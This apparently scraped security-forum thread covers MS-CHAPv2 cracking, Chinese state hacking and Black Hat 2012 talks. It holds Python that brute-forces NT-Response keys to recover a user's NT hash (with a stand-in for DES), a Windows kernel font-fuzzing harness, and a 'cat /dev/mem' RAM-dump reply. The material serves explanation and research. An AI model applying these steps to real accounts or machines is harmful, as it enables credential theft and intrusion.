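An added example, my own code rather than chapcrack's or CloudCracker's, that makes the divide-and-conquer in Moxie's quote concrete. It computes the NT hash with a pure-Python MD4 (hashlib's md4 is often disabled under OpenSSL 3), cuts the 16-byte hash into the three 7-byte DES keys exactly as RFC 2759 does (the last key is 2 hash bytes plus five zero bytes), builds the 24-byte NT-Response, and brute-forces the third key's two unknown bytes. Because all three DES operations encrypt the same 8-byte ChallengeHash, the first two keys fall to a single 2^56 sweep that checks both ciphertexts per candidate, which is the part CloudCracker's FPGA box does. DES itself is not implemented here: the DES primitive is passed in as a function (with pycryptodome you would pass `lambda k, b: DES.new(k, DES.MODE_ECB).encrypt(b)`), and `_stand_in_des` is a keyed hash used only so the search can run in this file without a cipher library; it is not DES. The username, challenges and password in the test are constructed values.

```python
import hashlib
import struct
from typing import List, Optional

MASK32 = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = _lrot((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _lrot((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NtPasswordHash (RFC 2759 §8.3): MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: str) -> bytes:
    """ChallengeHash (RFC 2759 §8.2): the 8-byte DES plaintext shared by all three keys."""
    return hashlib.sha1(peer_challenge + auth_challenge + username.encode()).digest()[:8]


def des_key_from_56(k7: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes with odd parity in each low bit (RFC 2759 §8.6)."""
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        out.append((seven << 1) | (0 if bin(seven).count("1") % 2 else 1))
    return bytes(out)


def split_keys(nthash: bytes) -> List[bytes]:
    """ChallengeResponse (RFC 2759 §8.5): zero-pad the hash to 21 bytes, cut 7+7+7."""
    padded = nthash + b"\x00" * 5
    return [padded[i:i + 7] for i in (0, 7, 14)]


def challenge_response(nthash: bytes, chal8: bytes, des_encrypt) -> bytes:
    """24-byte NT-Response: DES(k1, C) || DES(k2, C) || DES(k3, C)."""
    return b"".join(des_encrypt(des_key_from_56(k), chal8) for k in split_keys(nthash))


def recover_third_chunk(chal8: bytes, response24: bytes, des_encrypt) -> Optional[bytes]:
    """Key 3 is hash[14:16] plus five zero bytes, so this search is 2^16, not 2^56."""
    target = response24[16:24]
    for guess in range(1 << 16):
        k7 = guess.to_bytes(2, "big") + b"\x00" * 5
        if des_encrypt(des_key_from_56(k7), chal8) == target:
            return k7[:2]
    return None


def _stand_in_des(key8: bytes, block8: bytes) -> bytes:
    """NOT DES: a keyed placeholder so the search can run without a cipher library."""
    return hashlib.sha256(key8 + block8).digest()[:8]
```

Once `recover_third_chunk` returns the last two hash bytes, the remaining 14 bytes are two independent 56-bit DES keys with a known plaintext and two known ciphertexts, so one pass over the DES keyspace recovers both; that recovered NT hash is enough to authenticate as the user, without ever learning the password.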
-
[h=1]Hackers Linked to China’s Army Seen From EU to D.C.[/h]By Michael Riley and Dune Lawrence - Jul 27, 2012 2:00 AM GMT+0300 The hackers clocked in at precisely 9:23 a.m. Brussels time on July 18 last year, and set to their task. In just 14 minutes of quick keyboard work, they scooped up the e-mails of the president of the European Union Council, Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the bailout for Greece, according to a computer record of the hackers’ activity. Over 10 days last July, the hackers returned to the council’s computers four times, accessing the internal communications of 11 of the EU’s economic, security and foreign affairs officials. The breach, unreported until now, potentially gave the intruders an unvarnished view of the financial crisis gripping Europe. And the spies were themselves being watched. Working together in secret, some 30 North American private security researchers were tracking one of the biggest and busiest hacking groups in China. Observed for years by U.S. intelligence, which dubbed it Byzantine Candor, the team of hackers also is known in security circles as the Comment group for its trademark of infiltrating computers using hidden webpage computer code known as “comments.” During almost two months of monitoring last year, the researchers say they were struck by the sheer scale of the hackers’ work as data bled from one victim after the next: from oilfield services leader Halliburton Co. (HAL) to Washington law firm Wiley Rein LLP; from a Canadian magistrate involved in a sensitive China extradition case to Kolkata-based tobacco and technology conglomerate ITC Ltd. (ITC) [h=2]Gathering Secrets[/h]The researchers identified 20 victims in all -- many of them organizations with secrets that could give China an edge as it strives to become the world’s largest economy. 
The targets included lawyers pursuing trade claims against the country’s exporters and an energy company preparing to drill in waters China claims as its own. “What the general public hears about -- stolen credit card numbers, somebody hacked LinkedIn (LNKD) -- that’s the tip of the iceberg, the unclassified stuff,” said Shawn Henry, former executive assistant director of the FBI in charge of the agency’s cyber division until leaving earlier this year. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.” Exploiting a hole in the hackers’ security, the researchers created a digital diary, logging the intruders’ every move as they crept into networks, shut off anti-virus systems, camouflaged themselves as system administrators and covered their tracks, making them almost immune to detection by their victims. [h=2]Every Move[/h]The minute-by-minute accounts spin a never-before told story of the workaday routines and relentless onslaught of a group so successful that a cyber unit within the Air Force’s Office of Special Investigations in San Antonio is dedicated to tracking it, according to a person familiar with the unit. Those logs -- a record of the hackers’ commands to their victims’ computers -- also reveal the highly organized effort behind a group that more than any other is believed to be at the spear point of the vast hacking industry in China. Byzantine Candor is linked to China’s military, the People’s Liberation Army, according to a 2008 diplomatic cable released by WikiLeaks. Two former intelligence officials verified the substance of the document. [h=2]Hackers and Spies[/h]The methods behind China-based looting of technology and data -- and most of the victims -- have remained for more than a decade in the murky world of hackers and spies, fully known in the U.S. only to a small community of investigators with classified clearances. 
“Until we can have this conversation in a transparent way, we are going to be hard pressed to solve the problem,” said Amit Yoran, former National Cyber Security Division director at the Department of Homeland Security. Yoran now works for RSA Security Inc., a Bedford, Massachusetts-based security company which was hacked by Chinese teams last year. “I’m just not sure America is ready for that,” he said. What started as assaults on military and defense contractors has widened into a rash of attacks from which no corporate entity is safe, say U.S. intelligence officials, who are raising the alarm in increasingly dire terms. In an essay in the Wall Street Journal July 19, President Barack Obama warned that “the cyber threat to our nation is one of the most serious economic and national security challenges we face.” Ten days earlier, in a speech given in Washington, National Security Agency director Keith Alexander said cyber espionage constitutes “the greatest transfer of wealth in history,” and cited a figure of $1 trillion spent globally every year by companies trying to protect themselves. [h=2]Harvesting Secrets[/h]The networks of major oil companies have been harvested for seismic maps charting oil reserves; patent law firms for their clients’ trade secrets; and investment banks for market analysis that might impact the global ventures of state-owned companies, according to computer security experts who asked not to be named and declined to give more details. China’s foreign ministry in Beijing has previously dismissed allegations of state-sponsored cyberspying as baseless and said the government would crack down if incidents came to light. Contacted for this story, it did so again, referring to earlier ministry statements. Private researchers have identified 10 to 20 Chinese hacking groups but said they vary significantly in activity and size, according to government investigators and security firms. 
[h=2]Group Apart[/h]What sets the Comment group apart is the frenetic pace of its operations. The attacks documented last summer represent a fragment of the Comment group’s conquests, which stretch back at least to 2002, according to incident reports and interviews with investigators. Milpitas, California-based FireEye Inc. alone has tracked hundreds of victims in the last three years and estimates the group has hacked more than 1,000 organizations, said Alex Lanstein, a senior security researcher. Stolen information is flowing out of the networks of law firms, investment banks, oil companies, drug makers, and high technology manufacturers in such significant quantities that intelligence officials now say it could cause long-term harm to U.S. and European economies. [h=2]’Earthquake Is Coming’[/h]“The activity we’re seeing now is the tremor, but the earthquake is coming,” said Ray Mislock, who before retiring in September was chief security officer for DuPont Co., which has been hacked by unidentified Chinese teams at least twice since 2009. “A successful company can’t sustain a long-term loss of knowledge that creates economic power,” he said. Even those offline aren’t safe. Y.C. Deveshwar, 65, a businessman who heads ITC, India’s largest maker of cigarettes, doesn’t use a computer. The Comment hackers last year still managed to steal a trove of his documents, navigating the conglomerate’s huge network to pinpoint the machine used by Deveshwar’s personal assistant. On July 5, 2011, the thieves accessed a list of documents that included Deveshwar’s family addresses, tax filings, and meeting minutes, as well as letters to fellow executives, such as London-based British American Tobacco Plc (BATS) chairman Richard Burrows and BAT chief executive, Nicandro Durante, according to the logs. They tried to open one entitled “YCD LETTERS” but couldn’t, so the hackers set up a program to steal a password the next time his assistant signed on. 
[h=2]Keeping Quiet[/h]When Bloomberg contacted the company in May, spokesman Nazeeb Arif said ITC was unaware of the breach, potentially giving the hackers unimpeded access to ITC’s network for more than a year. Deveshwar said in a statement that “no classified company related documents” were kept on the computer. Companies that discover their networks have been commandeered usually keep quiet, leaving the public, shareholders and clients unaware of the magnitude of the problem. Of the 10 Comment group victims reached by Bloomberg, those who learned of the hacks chose not to disclose them publicly, and three said they were unaware they’d been hacked until contacted for this story. This account of the Comment group is based on the researchers’ logs, as well as interviews with current and former intelligence officials, victims, and more than a dozen U.S. cybersecurity experts, many of whom track the group independently. [h=2]Private Investigators[/h]The researcher who provided the computer logs asked not to be named because of the sensitivity of the data, which included the name of victims. He was part of a collaborative drawn from 20 organizations that included people from private security companies, a university, internet service providers and companies that have been targeted, including a defense contractor and a pharmaceutical firm. The group included some of the top experts in the field, with experience investigating cyberspying against the U.S. government, major corporations and high profile political targets, including the Dalai Lama. Like similar, ad hoc teams formed temporarily to study hackers’ techniques, the group worked in secret because of the sensitivities of the investigation aimed at state-sponsored espionage. A smaller version of the group is continuing its research. 
As the surge in attacks on businesses and non-government groups over the last five years has pulled private security experts into the hacker hunt, they say they’re gradually catching up with U.S. counterintelligence agencies, which have been tackling the problem for a decade. [h=2]Espionage Tools[/h]One Comment group trademark involves hijacking unassuming public websites to send commands to victim computers, turning mom-and-pop sites into tools of foreign espionage, but also allowing the group to be monitored if those websites can be found, according to security experts. Sites it has commandeered include one for a teacher at a south Texas high school with the website motto “Computers Rock!” and another for a drag racing track outside Boise, Idaho. Adding a potentially important piece to the puzzle, researcher Joe Stewart, who works for Dell SecureWorks, an Atlanta-based security firm and division of Dell Inc. (DELL), the computer technology company, last year uncovered a flaw in software used by Comment group hackers. Designed to disguise the pilfered data’s ultimate destination, the mistake instead revealed that in hundreds of instances, data was sent to Internet Protocol (IP) addresses in Shanghai. [h=2]Military Link?[/h]The location matched intelligence contained in the 2008 State Department cable published by WikiLeaks that placed the group in Shanghai and linked it to China’s military. Commercial researchers have yet to make that connection. The basis for that cable’s conclusion, which includes the U.S.’s own spying, remains classified, according to two former intelligence specialists. Lanstein said that although the make-up of the Comment group has changed over time -- the logs show some inexperienced hackers in the group making repeated mistakes, for example -- the characteristics of a single group are unmistakable. The code and tools used by Comment aren’t public, and anyone using it would have to be given entrée into the hackers’ ranks, he said.
By October 2008, when the diplomatic cable published by WikiLeaks outlined the group’s activities, the Comment group had raided the networks of defense contractors and the Department of State, as well as made a specialty of hacking U.S. Army systems. The classified code names for China’s hacking teams were changed last year after that leak. Cybersecurity experts have connected the group to a series of headline-grabbing hacks, ranging from the 2008 presidential campaigns of Barack Obama and John McCain to the 72 victims documented last year by the Santa Clara, California-based security firm McAfee Inc., in what it called Operation Shady Rat. [h=2]Nuclear Break-In[/h]Others, not publicly attributed to the group before, include a campaign against North American natural gas producers that began in December 2011 and was detailed in an April alert by the Department of Homeland Security, two experts who analyzed the attack said. In another case, the hackers first stole a contact list for subscribers to a nuclear management newsletter, and then sent them forged e-mails laden with spyware. In that instance, the group succeeded in breaking into the computer network of at least one facility, Diablo Canyon nuclear plant, next to the Hosgri fault north of Santa Barbara, according to a person familiar with the case who asked not to be named. Last August, the plant’s incident management team saw an anonymous Internet post that had been making the rounds among cybersecurity professionals. It purported to identify web domains being used by a Chinese hacking group, including one that suggested a possible connection to Diablo plant operator Pacific Gas & Electric Co., according to an internal report obtained by Bloomberg News. [h=2]Partial Control[/h]It’s unclear how the information got to the Internet, but when the plant investigated, it found that the computer of a senior nuclear planner was at least partly under the control of the hackers, according to the report. 
The internal probe warned that the hackers were attempting “to identify the operations, organizations, and security of U.S. nuclear power generation facilities.” The investigators concluded that they had caught the breach early and there was “no solid indication” data was stolen, according to the report, though they also found evidence of several previous infections. Blair Jones, a spokesman for PG&E, declined to comment, citing plant security. Around the time the hackers were sending malware-laden e-mails to U.S. nuclear facilities, six people at the Wiley Rein law firm were ushered into hastily called meetings. In the room were an ethics compliance officer and a person from the firm’s information technology team, according to a person familiar with the investigation. The firm had been hacked, each of the six was told, and they were the targets. [h=2]Lawyers’ Files[/h]Among them were Alan Price and Timothy Brightbill. Firm partners and among the best known international trade lawyers in the country, they’ve handled a series of major anti-dumping and unfair trade cases against China. One of those, against China’s solar cell manufacturers, in May resulted in tariffs on more than $3 billion in Chinese exports, making it one of the largest anti-dumping cases in U.S. history. Dale Hausman, Wiley Rein’s general counsel, said he couldn’t comment on how the breach affected the firm or its clients. Wiley Rein has since strengthened its network security, Hausman said. “Given the nature of that practice, it’s almost a cost of doing business. It’s not a surprise,” he said. [h=2]E-Mails to Spouses[/h]Tipped off by the researchers, the firm called the Federal Bureau of Investigation, which dispatched a team of cyber investigators, the person familiar with the investigation said. Comment hackers had encrypted the data they stole, a trick designed to make it harder to determine what was taken. The FBI managed to decode it.
The data included thousands of pages of e-mails and documents, from lawyers’ personal chatter with their spouses to confidential communications with clients. Printed out in a stack, the cache was taller than a set of encyclopedias, the person said. Researchers watching the hackers’ keystrokes last summer say they couldn’t see most of what was stolen, but it was clear that the spies had complete control over the firm’s e-mail system. The logs also hold a clue to how the FBI might have decrypted what was stolen. They show the simple password the hackers used to encrypt the files: 123!@#. Paul Bresson, a spokesman for the FBI in Washington, declined to comment. [h=2]Following the Crisis[/h]In case after case, the hackers’ trail crisscrossed with geopolitical events and global headlines. Last summer, as the news focused on Europe’s financial crisis, with its import for China’s rising economic power, the hackers followed. The timing coincided with an intense period for EU Council President Van Rompuy, set off by the failure July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight and balding former Belgian prime minister presided over the negotiations, drawing European leaders, including German Chancellor Angela Merkel, to a consensus. Although the monitoring of Van Rompuy and his staff occurred during those talks, researchers say that the logs suggest a broad attack that wasn’t timed to a specific event. It was the cyber equivalent of a wiretap, they say -- an operation aimed at gathering vast amounts of intelligence over weeks, perhaps months. [h=2]’Big Implications’[/h]Richard Falkenrath, former deputy homeland security adviser to President George W. Bush, said China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he said. 
Beginning July 8, 2011, the hackers’ access already established, they dipped into the council’s networks repeatedly over 10 days. The logs suggest an established routine, with the spies always checking in around 9 a.m. local time. They controlled the council’s exchange server, which gave them complete run of the e-mail system, the logs show. From there, the hackers simply opened the accounts of Van Rompuy and the others. [h=2]Week of E-Mails[/h]Moving from one victim to the next, the spies grabbed e-mails and attached documents, encrypted them in compression files and catalogued the reams of material by date. They grabbed a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included then economic adviser and deputy head of cabinet, Odile Renaud-Basso, and the EU’s counter-terrorism coordinator. It’s unclear how long the hackers had been in the council’s network before the researchers’ monitoring began -- or how long it lasted after the end of July last year. There’s no indication the hackers penetrated the council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the council press office said in a statement when asked about the hacks. The networks connected to the Internet, which handle e-mail, “are not designed for handling classified information.” What the EU did about the breach is unclear. Dirk De Backer, a spokesman for Van Rompuy, declined to comment on the incident, as did an official from the EU Council’s press office. A member of the EU’s security team joined the group of researchers in late July, and was provided information that would help identify the hackers’ trail, one of the researchers said.
[h=2]“No Knowledge”[/h]Zoltan Martinusz, then principal adviser on external affairs and one of two victims reached by Bloomberg who would address the issue, said, “I have no knowledge of this.” The other official, who wasn’t authorized to discuss internal security and asked not to be identified, said he was informed last year that his e-mails had been accessed. The logs show how the hackers consistently applied the same, simple line of attack, the researchers said. Starting with a malware-laden e-mail, they moved rapidly through networks, grabbing encrypted passwords, cracking the coding offline, and then returning to mimic the organization’s own network administrators. The hackers were able to dip in and out of networks sometimes over months. The approach circumvented the millions of dollars the organizations collectively spent on protection. [h=2]Security Switched Off[/h]As the spies rifled the network of Business Executives for National Security Inc., a Washington-based nonprofit whose advisory council includes former Secretary of State Henry Kissinger and former Treasury Secretary Robert Rubin, the logs show them switching off the system’s Symantec anti-virus software. Henry Hinton Jr., the group’s chief operations officer, said in June he was unaware of the hack, confirming the user names of staff computers that the logs show were accessed, his among them. The records show the hackers’ mistakes, but also clever tricks. Using network administrator status, they consolidated onto a single machine the computer contents of the president and seven other staff members of the International Republican Institute, a nonprofit group promoting democracy. [h=2]220 Documents[/h]With all that data in one place, the hackers on June 29, 2011, selected 220 documents, including PDFs, spreadsheets, photos and the organization’s entire work plan for China. 
When they were done, the Comment group zipped up the documents into several encrypted files, making the data less noticeable as it left the network, the logs show. Lisa Gates, a spokeswoman for the IRI, confirmed that her organization was hacked but declined to comment on the impact on its programs in China because of concern for the safety of staff and people who work with the group. A funding document describes activities including supporting independent candidates in China, who frequently face harassment by China’s authorities. As a portrait of the hackers at work, the logs also show how nimbly they could respond to events, even when sensitive government networks were involved. The hackers accessed the network of the Immigration and Refugee Board of Canada July 18 last year, targeting the computer of Leeann King, an immigration adjudicator in Vancouver. King had made headlines less than a week earlier when she temporarily freed Chinese national Lai Changxing in the final days of a long extradition fight. Chinese authorities had been chasing Lai since he fled to Canada in 1999, alleging that he ran a smuggling ring that netted billions of dollars. [h=2]Cracking Court Accounts[/h]Monitoring by Cyber Squared Inc., an Arlington, Virginia-based company that tracks Comment independently and that captured some of the same activity as the researchers, recorded the hackers as they worked rapidly to break into King’s account. Beginning only with access to computers in Toronto, the hackers grabbed and decrypted user passwords, gaining access to IRB’s network in Vancouver and ultimately, the logs show, to King’s computer. From start to finish, the work took just under five hours. Melissa Anderson, a spokeswoman for the board, said officials had no comment on the incident other than to say that any such event would be fully investigated. Lai was eventually sent back to China on July 23, 2011 after losing a final appeal.
He was arrested, tried, and in May of this year, a Chinese court sentenced him to life in prison. [h=2]Controlling the Networks[/h]In case after case, the hackers had the run of the networks they were rifling. It’s unclear how many of the organizations researchers contacted, but in only one of those cases was the victim already aware of the intrusion, according to one member of the group. Halliburton officials said they were aware of the intrusion and were working with the FBI, one of the researchers said. Marisol Espinosa, a spokeswoman for the publicly traded company, declined to comment on the incident. The trail last summer led to some unlikely spots, including Pietro’s, an Italian restaurant a couple of blocks from Grand Central station in New York. In business since 1932, guests to the dim, old-fashioned dining room can choose linguine with clam sauce (red or white) for $28. The Comment group stopped using the restaurant’s site to communicate with hacked networks sometime last year, said FireEye’s Lanstein, who discovered that the hackers had left footprints there. Traces are still there. [h=2]’Ugly Gorilla’[/h]Hidden in the webpage code of the restaurant’s site is a single command: ugs12, he said. It’s an order to a captive computer on some victim’s network to sleep for 12 minutes, then check back in, he explained. The ”ug” stands for “ugly gorilla,” what security experts believe is a moniker for a particularly brash member of Comment, a signal for anyone looking that the hackers were there, said Lanstein. “We’re so good even hackers want us!” joked Bill Bruckman, the restaurant’s co-owner, when he was told his website had been part of the global infrastructure of a Chinese hacking team. “Hey, put my name out there -- any business is good business,” he said. Bruckman said he knew nothing about the breach. A few friends reported trouble accessing the site about six months ago, though he said he’d never figured out what the problem was. 
Outside a moment later, smoking a cigarette, Bruckman added a more serious note. “Think of all that effort and information going down the drain. What a waste, you know what I mean?” Sursa: Hackers Linked to China’s Army Seen From EU to D.C. - Bloomberg
-
Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun Description: Blackhat 2012 EUROPE - GDI Font Fuzzing in Windows Kernel For Fun https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Slides.pdf https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-Tool.zip There are different types of font available within Windows, falling into two categories: GDI fonts and device fonts. This talk covers GDI TrueType and GDI bitmap fonts on the Windows platform only. In GDI, the typical way to create a font is to fill in a LOGFONT structure and then call CreateFontIndirect, which returns a font handle. As the name suggests, a LOGFONT structure describes a logical font: if the user draws some text using that font handle, GDI looks for a matching physical font to draw the text, and if it does not find a font with a matching name it uses some other font. The consequence is that the font fuzzer has to work at the lower level, through the physical-font APIs provided by GDI itself, for instance GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. The font fuzzer in this talk aims to trigger the font vulnerabilities published on the internet; two Windows kernel vulnerabilities in the handling of crafted fonts, MS11-077 and MS11-087, will be discussed. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Sursa: Blackhat 2012 Europe - Gdi Font Fuzzing In Windows Kernel For Fun
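An added example, my own code rather than the speaker's fuzzer or anything from the whitepaper, showing the shape of a harness built on the physical-font calls the abstract names. The sfnt table-directory parser and the mutator run anywhere; `exercise_font_win32` wraps the GDI calls through ctypes and only runs on Windows. Mutating inside one table while leaving the directory intact is the deliberate choice: a font that fails the file-level checks never reaches the per-table parsers in win32k where the kernel bugs live. The face name passed to CreateFontIndirectW must be the one in the font's own name table; `build_sample_sfnt` is a constructed two-table file for testing the parser and is not a loadable font.

```python
import ctypes
import random
import struct
import sys
from typing import Dict, Tuple

ETO_GLYPH_INDEX = 0x0010  # ExtTextOut: lpString holds glyph indices, not characters


def parse_table_directory(font: bytes) -> Dict[str, Tuple[int, int]]:
    """Read the sfnt offset table and return {tag: (offset, length)}."""
    if len(font) < 12:
        raise ValueError("not an sfnt: too short")
    version, num_tables = struct.unpack(">IH", font[:6])
    if version not in (0x00010000, 0x74727565):  # 1.0 or 'true'
        raise ValueError("unsupported sfnt version 0x%08x" % version)
    tables = {}
    for i in range(num_tables):
        rec = 12 + 16 * i
        tag, _checksum, off, length = struct.unpack(">4sIII", font[rec:rec + 16])
        if off + length > len(font):
            raise ValueError("table %r runs past end of file" % tag)
        tables[tag.decode("latin-1")] = (off, length)
    return tables


def mutate_table(font: bytes, tag: str, flips: int, seed: int) -> bytes:
    """Flip bits inside one table only; the directory stays intact so GDI gets
    past the file-level checks and into that table's parser."""
    rng = random.Random(seed)
    off, length = parse_table_directory(font)[tag]
    buf = bytearray(font)
    for _ in range(flips):
        buf[off + rng.randrange(length)] ^= 1 << rng.randrange(8)
    return bytes(buf)


def build_sample_sfnt() -> bytes:
    """Constructed two-table sfnt for testing the parser; not a loadable font."""
    tables = [(b"glyf", b"\xAA" * 32), (b"loca", b"\x00\x00\x00\x10" * 4)]
    header = struct.pack(">IHHHH", 0x00010000, len(tables), 32, 1, 0)
    data_start = 12 + 16 * len(tables)
    directory, body = b"", b""
    for tag, data in tables:
        directory += struct.pack(">4sIII", tag, 0, data_start + len(body), len(data))
        body += data + b"\x00" * ((-len(data)) % 4)
    return header + directory + body


class LOGFONTW(ctypes.Structure):
    _fields_ = [("lfHeight", ctypes.c_long), ("lfWidth", ctypes.c_long),
                ("lfEscapement", ctypes.c_long), ("lfOrientation", ctypes.c_long),
                ("lfWeight", ctypes.c_long), ("lfItalic", ctypes.c_ubyte),
                ("lfUnderline", ctypes.c_ubyte), ("lfStrikeOut", ctypes.c_ubyte),
                ("lfCharSet", ctypes.c_ubyte), ("lfOutPrecision", ctypes.c_ubyte),
                ("lfClipPrecision", ctypes.c_ubyte), ("lfQuality", ctypes.c_ubyte),
                ("lfPitchAndFamily", ctypes.c_ubyte), ("lfFaceName", ctypes.c_wchar * 32)]


def exercise_font_win32(font: bytes, face_name: str, text: str = "Fuzz") -> bool:
    """Windows only: load the blob as a private font, select it into a DC and drive
    GetFontData, GetGlyphIndicesW and ExtTextOutW(ETO_GLYPH_INDEX). A kernel-side
    bug surfaces as a bugcheck, so run this under a debugger with crash dumps on."""
    if sys.platform != "win32":
        raise OSError("GDI is only available on Windows")
    gdi32, user32 = ctypes.windll.gdi32, ctypes.windll.user32
    for fn in (gdi32.AddFontMemResourceEx, gdi32.CreateFontIndirectW,
               gdi32.SelectObject, user32.GetDC):
        fn.restype = ctypes.c_void_p  # keep 64-bit handles intact
    count = ctypes.c_uint32(0)
    hres = gdi32.AddFontMemResourceEx(font, len(font), None, ctypes.byref(count))
    if not hres or count.value == 0:
        return False  # GDI rejected the file before any glyph was touched
    hdc = user32.GetDC(None)
    lf = LOGFONTW(lfHeight=-24, lfFaceName=face_name)
    hfont = gdi32.CreateFontIndirectW(ctypes.byref(lf))
    old = gdi32.SelectObject(ctypes.c_void_p(hdc), ctypes.c_void_p(hfont))
    try:
        gdi32.GetFontData(ctypes.c_void_p(hdc), 0, 0, None, 0)  # size query, whole file
        glyphs = (ctypes.c_uint16 * len(text))()
        gdi32.GetGlyphIndicesW(ctypes.c_void_p(hdc), text, len(text), glyphs, 0)
        return bool(gdi32.ExtTextOutW(ctypes.c_void_p(hdc), 0, 0, ETO_GLYPH_INDEX,
                                      None, glyphs, len(text), None))
    finally:
        gdi32.SelectObject(ctypes.c_void_p(hdc), ctypes.c_void_p(old))
        gdi32.DeleteObject(ctypes.c_void_p(hfont))
        user32.ReleaseDC(None, ctypes.c_void_p(hdc))
        gdi32.RemoveFontMemResourceEx(ctypes.c_void_p(hres))


def fuzz(font: bytes, face_name: str, iterations: int, seed: int = 1) -> int:
    """Mutate one table per iteration and load the result; returns how many
    mutants GDI accepted end to end."""
    rng = random.Random(seed)
    tags = list(parse_table_directory(font))
    accepted = 0
    for i in range(iterations):
        mutant = mutate_table(font, rng.choice(tags), rng.randint(1, 8), seed + i)
        accepted += exercise_font_win32(mutant, face_name)
    return accepted
```

On a Windows box you would call `fuzz(open("seed.ttf", "rb").read(), "Seed Face Name", 10000)`; the seed and iteration index are logged together so a bugcheck can be reproduced by regenerating exactly the mutant that caused it.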
-
Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis Description: https://media.blackhat.com/bh-eu-12/Haruyama/bh-eu-12-Haruyama-Memory_Forensic-Slides.pdf Memory forensics is an effective technique to detect malware quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods have been proposed and demonstrated, but there has been no sufficient discussion of anti-analysis ones. This presentation introduces anti-analysis methods based on unconsidered assumptions of the existing analysis tools. By using the methods, attackers can abort memory analysis and make the result empty. Since it is difficult for forensic analysts to figure out the cause from error messages, they will think the acquired memory images are simply corrupted. Specifically, the anti-analysis methods focus attention on three operations performed in memory analysis. All major analysis tools take several shortcut approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is modify only one byte of the data structure related to one approach. Of course, the modification has no impact on the running system. The presentation is made up as follows. First, I show an overview of memory acquisition and analysis, such as memory image formats, evaluation of acquisition tools, memory analyzing methods, comparison of analysis tools, and so on. Next, I point out issues of each analysis tool and the key structures referred to by it, then I demonstrate that all analysis tools fail when data in those structures is modified. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods. Sursa: Blackhat 2012 Europe - One-Byte Modification For Breaking Memory Forensic Analysis
-
Blackhat 2012 Europe - Hdmi - Hacking Displays Made Interesting Description: https://media.blackhat.com/bh-eu-12/Davis/bh-eu-12-Davis-HDMI-WP.pdf https://media.blackhat.com/bh-eu-12/Davis/bh-eu-12-Davis-HDMI-Slides.pdf Picture this scene, which happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight; it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation? This presentation discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. It also details the construction of a hardware-based EDID fuzzer using an Arduino microcontroller and a discussion of some of its findings. Original Source: Source: Blackhat 2012 Europe - Hdmi - Hacking Displays Made Interesting
-
Looks very good. Are these the materials from the Information Security master's programme at ASE? Did you do the master's there? Can you give more details? I would be interested in doing that master's too, which is why I'm asking.
-
The program that can extract data from RAM
Nytro replied to say3er.'s topic in Security news
cat /dev/mem > ~/dump.bin Well, from 2.6 on I read that it no longer works quite this raw; it's restricted. -
